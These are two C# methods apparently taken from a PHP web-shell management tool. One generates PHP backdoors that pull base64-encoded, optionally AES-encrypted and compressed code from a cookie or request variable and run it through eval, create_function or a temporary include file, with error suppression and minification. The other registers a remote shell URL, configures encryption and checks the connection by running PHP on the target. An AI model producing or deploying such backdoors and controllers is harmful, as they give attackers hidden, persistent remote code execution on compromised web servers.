/// <summary>
        /// Main backdoor "generation" code that forms the backdoor code based on the options
        /// </summary>
        /// <param name="varName"></param>
        /// <param name="method"></param>
        /// <param name="gzInflateRequest"></param>
        /// <param name="backdoorType"></param>
        /// <returns></returns>
        public string generateBackdoor(string varName = "command", string method = "COOKIE", bool gzInflateRequest = false, BackdoorTypes backdoorType = BackdoorTypes.EVAL)
        {
            string backdoorResult         = string.Empty;
            string gzInflateStart         = string.Empty;
            string gzInflateEnd           = string.Empty;
            string requestEncryptionStart = string.Empty;
            string requestEncryptionEnd   = string.Empty;

            string requestMethod = method.ToUpper(CultureInfo.InvariantCulture);

            if (checkBoxEncryptRequest.Checked)
            {
                string encryptionKey = textBoxEncrpytionKey.Text;

                if (encryptionKey.Length == CryptoHelper.KEY_Length)
                {
                    if (checkBoxSendIVInRequest.Checked)
                    {
                        string encryptionIVVarName = textBoxIVVarName.Text;

                        if (!string.IsNullOrEmpty(encryptionIVVarName))
                        {
                            if (comboBoxRequestEncryptionType.Text == "openssl")
                            {
                                requestEncryptionStart = "@openssl_decrypt(";
                                requestEncryptionEnd   = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, $_" + requestMethod + "['" + encryptionIVVarName + "'])";
                            }
                            else if (comboBoxRequestEncryptionType.Text == "mcrypt")
                            {
                                requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
                                requestEncryptionEnd   = ", MCRYPT_MODE_CBC, $_" + requestMethod + "['" + encryptionIVVarName + "']), \"0\")";
                            }
                        }
                    }
                    else
                    {
                        string encryptionIV = textBoxEncrpytionIV.Text;

                        if (!string.IsNullOrEmpty(encryptionIV) && encryptionIV.Length == CryptoHelper.IV_Length)
                        {
                            if (comboBoxRequestEncryptionType.Text == "openssl")
                            {
                                requestEncryptionStart = "@openssl_decrypt(";
                                requestEncryptionEnd   = ", 'AES-256-CBC', '" + encryptionKey + "', OPENSSL_RAW_DATA, '" + encryptionIV + "')";
                            }
                            else if (comboBoxRequestEncryptionType.Text == "mcrypt")
                            {
                                requestEncryptionStart = "rtrim(@mcrypt_decrypt(MCRYPT_RIJNDAEL_128, '" + encryptionKey + "', ";
                                requestEncryptionEnd   = ", MCRYPT_MODE_CBC, '" + encryptionIV + "'), \"0\")";
                            }
                        }
                    }
                }
            }

            if (gzInflateRequest)
            {
                gzInflateStart = "@gzinflate(";
                gzInflateEnd   = ")";
            }

            switch (backdoorType)
            {
            case BackdoorTypes.EVAL: {
                backdoorResult = "<?php \r\n" +
                                 "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
                                 "@eval(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
                break;
            }

            //case BackdoorTypes.ASSERT: {
            //        backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@assert(" + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n}";
            //        break;
            //    }

            case BackdoorTypes.CREATE_FUNCTION: {
                backdoorResult = "<?php \r\n" +
                                 "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
                                 "$a=@create_function(null, " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" +
                                 "$a();\r\n}";
                break;
            }

            case BackdoorTypes.TMP_INCLUDE: {
                backdoorResult = "<?php \r\n" +
                                 "if(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t" +
                                 "$fp = @tmpfile();\r\n\t" +
                                 "$tmpf=@stream_get_meta_data($fp);\r\n\t" +
                                 "$tmpf=$tmpf['uri'];\r\n\t" +
                                 "@fwrite($fp, '<?php '." + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "'])" + requestEncryptionEnd + gzInflateEnd + ");\r\n\t" +
                                 "@include($tmpf);\r\n\t@fclose($f);\r\n}";
                break;
            }

            //case BackdoorTypes.PREG_REPLACE: {
            //        //todo this looks wrong af and doesnt support gzip
            //        backdoorResult = "<?php \r\nif(isset($_" + requestMethod + "['" + varName + "'])) {\r\n\t@preg_replace(\"/.*/\x65\", " + gzInflateStart + requestEncryptionStart + "@base64_decode($_" + requestMethod + "['" + varName + "']" + requestEncryptionEnd + gzInflateEnd + "),'.');\r\n}";
            //        break;
            //    }

            default:
                LogHelper.AddGlobalLog("Unknown backdoor type selection.", "GUI Error", LogHelper.LOG_LEVEL.ERROR);
                break;
            }

            if (chkbxMinifyCode.Checked)
            {
                backdoorResult = Helper.MinifyCode(backdoorResult);
            }
            return(backdoorResult);
        }
Beispiel #2
0
        /// <summary>
        /// Main add shell/host To GUI routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnAddShell_Click(object sender, EventArgs e)
        {
            string shellURL = txtBoxShellUrl.Text;

            if (string.IsNullOrEmpty(shellURL))
            {
                return;
            }

            if (checkBoxEncryptRequest.Checked)
            {
                string encryptionKey = textBoxEncrpytionKey.Text;

                if (encryptionKey.Length != 32)
                {
                    labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
                    return;
                }

                if (!checkBoxSendIVInRequest.Checked)
                {
                    string encryptionIV = textBoxEncrpytionIV.Text;

                    if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
                    {
                        labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                        return;
                    }
                }
            }

            //Remove Shell
            if (BantamMain.Shells.ContainsKey(shellURL))
            {
                BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

                if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut))
                {
                    LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                    return;
                }
            }

            //Add Shell
            if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo()))
            {
                LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                return;
            }

            BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;

            if (comboBoxVarType.Text == "cookie")
            {
                BantamMain.Shells[shellURL].SendDataViaCookie = true;
            }

            if (checkBoxResponseEncryption.Checked == false)
            {
                BantamMain.Shells[shellURL].ResponseEncryption = false;
            }
            else
            {
                BantamMain.Shells[shellURL].ResponseEncryption     = true;
                BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
            }

            if (checkBoxGZipRequest.Checked)
            {
                BantamMain.Shells[shellURL].GzipRequestData = true;
            }
            else
            {
                BantamMain.Shells[shellURL].GzipRequestData = false;
            }

            bool encryptResponse        = BantamMain.Shells[shellURL].ResponseEncryption;
            int  ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;

            if (checkBoxEncryptRequest.Checked)
            {
                BantamMain.Shells[shellURL].RequestEncryption    = true;
                BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;

                if (checkBoxSendIVInRequest.Checked)
                {
                    BantamMain.Shells[shellURL].SendRequestEncryptionIV           = true;
                    BantamMain.Shells[shellURL].RequestEncryptionIV               = string.Empty;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
                }
                else
                {
                    BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                }
            }
            else
            {
                BantamMain.Shells[shellURL].RequestEncryption = false;
                BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionIV  = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
            }

            string         phpCode  = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
            ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

            if (string.IsNullOrEmpty(response.Result))
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            string result = response.Result;

            if (encryptResponse)
            {
                result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
            }

            if (string.IsNullOrEmpty(result) || result != "1")
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            BantamMain.Instance.InitializeShellData(shellURL);

            this.Close();
        }